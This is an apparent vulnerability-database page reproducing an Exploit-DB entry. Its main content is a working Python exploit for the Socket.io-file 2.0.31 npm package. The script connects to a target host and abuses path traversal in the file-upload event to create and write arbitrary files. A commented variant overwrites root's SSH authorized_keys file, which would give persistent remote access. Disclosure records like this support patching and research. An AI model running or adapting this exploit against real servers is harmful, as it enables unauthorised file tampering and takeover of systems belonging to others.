Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Socket.io-file 2.0.31 - Arbitrary File Upload

🗓️ 26 Jul 2020 00:00:00Reported by Cr0wTomType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 211 Views

Socket.io-file 2.0.31 - Arbitrary File Upload. Exploit allows arbitrary file creation and data writing by exploiting improper input validation in file upload functionality

Code
# Exploit Title: Socket.io-file 2.0.31 - Arbitrary File Upload
# Date: 2020-07-02
# Exploit Author: Cr0wTom
# Vendor Homepage: https://www.npmjs.com/package/socket.io-file
# Software Link: https://www.npmjs.com/package/socket.io-file/v/2.0.31
# Version: <= v2.0.31
# Tested on: node v10.19.0, Socket.io-file v2.0.31, socket.io v2.3.0
# CVE: -

# Requirements: pip install socketIO-client-nexus==0.7.6

#!/usr/bin/env python

import sys
import json
import os
from socketIO_client_nexus import SocketIO, LoggingNamespace

def file_creation(RHOST, RPORT):
    print ('Initiating connection...')
    with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO:

        print ('Creating file...')

        # Example server running in /home/testuser/Documents/socket-app so customize the path appropriately 
        # Change the "name" option if you want to create an other file in an different path of the system
        socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}})

        # Example for server running with root access:
        # socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}})
        
        print ('Writing data to file...')

        # Add the data you want to get written to the file
        data = "Exploited by Cr0wTom"
        json_string = json.dumps(data)
        socketIO.once("socket.io-file::request::u_0", on_aaa_response)
        socketIO.emit("socket.io-file::stream::u_0", json_string)

def on_aaa_response(*args):
    print('on_aaa_response', args)

def print_usage():
    print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
    print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
    print ('Usage: python3 exploit.py <RHOST> <RPORT>')
    print ('RHOST        The target host IP address or domain.')
    print ('RPORT        The target host port number of the nodejs server.')

if __name__ == '__main__':

    # ensure we have at least an IP and Port
    if len(sys.argv) < 3:
        print_usage()
        sys.exit(1)

    print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
    print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
    file_creation(sys.argv[1], sys.argv[2])

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jul 2020 00:00Current
7.4High risk
Vulners AI Score7.4
socket.io-filearbitrary file uploadexploitimproper input validation
211